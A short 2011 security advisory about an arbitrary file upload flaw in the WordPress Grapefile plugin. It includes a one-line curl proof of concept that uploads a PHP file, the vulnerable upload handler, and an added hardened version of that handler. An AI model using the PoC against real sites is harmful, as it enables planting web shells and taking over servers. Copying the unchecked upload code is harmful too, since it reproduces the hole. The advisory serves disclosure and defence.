WordPress Grapefile plugin versions 1.1 and below suffer from a remote shell upload vulnerability.
Title: WordPress grapefile plugin <= 1.1 Arbitrary file upload
Date: 30-8-2011
Author: Hrvoje Spoljar [ hrvoje.spoljar(at)gmail.com ]
Version: 1.1
Software link: https://wordpress.org/extend/plugins/grapefile/
PoC:
curl -F "userfile=@mycode.php" https://domain.tld/wp-content/plugins/grapefile/grapeupload.php
File(s): grapeupload.php grapeupload2.php grapeupload3.php grapeupload4.php
Vulnerable code:
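// Destination is inside the web root, and the client-supplied file name is kept.
$uploaddir = $_SERVER["DOCUMENT_ROOT"].'/wp-content/plugins/grapefile/filestore/avi/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
// No check on the file's extension or content before it is moved into place.
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
    echo "success";
}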
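
Hardened form of the handler above, as an added example (not the plugin's code and not from the advisory author). The allow-list, the storage path outside the document root, and the function names safe_upload_name() and handle_upload() are assumptions made for illustration; authentication of the requester is assumed to happen before this code runs.

```php
<?php
// Added example. Extension => MIME type the file content must match (assumed set).
const ALLOWED_TYPES = [
    'avi' => 'video/x-msvideo',
    'mp4' => 'video/mp4',
];

// Returns a server-chosen file name, or null when the upload must be rejected.
function safe_upload_name(string $clientName, string $detectedMime): ?string
{
    // Only the final extension of the client name is used, and only as a lookup key.
    $ext = strtolower(pathinfo(basename($clientName), PATHINFO_EXTENSION));
    if (!isset(ALLOWED_TYPES[$ext]) || ALLOWED_TYPES[$ext] !== $detectedMime) {
        return null;
    }
    // Random name: nothing else from the client-supplied name reaches the disk,
    // so "x.php.avi" is stored as "<random>.avi".
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

function handle_upload(array $file, string $destDir): bool
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return false;
    }
    // Type is detected from the file content, not from the request's Content-Type.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $name = safe_upload_name($file['name'], (string) $mime);
    if ($name === null) {
        return false;
    }
    return move_uploaded_file($file['tmp_name'], rtrim($destDir, '/') . '/' . $name);
}

if (isset($_FILES['userfile'])) {
    // Assumed directory outside the document root, so stored files are never
    // served or executed directly by the web server.
    $ok = handle_upload($_FILES['userfile'], '/var/lib/grapefile/avi');
    http_response_code($ok ? 200 : 400);
    echo $ok ? 'success' : 'rejected';
}
```

If the files must stay under the web root, the web server should additionally be configured not to execute scripts in the upload directory.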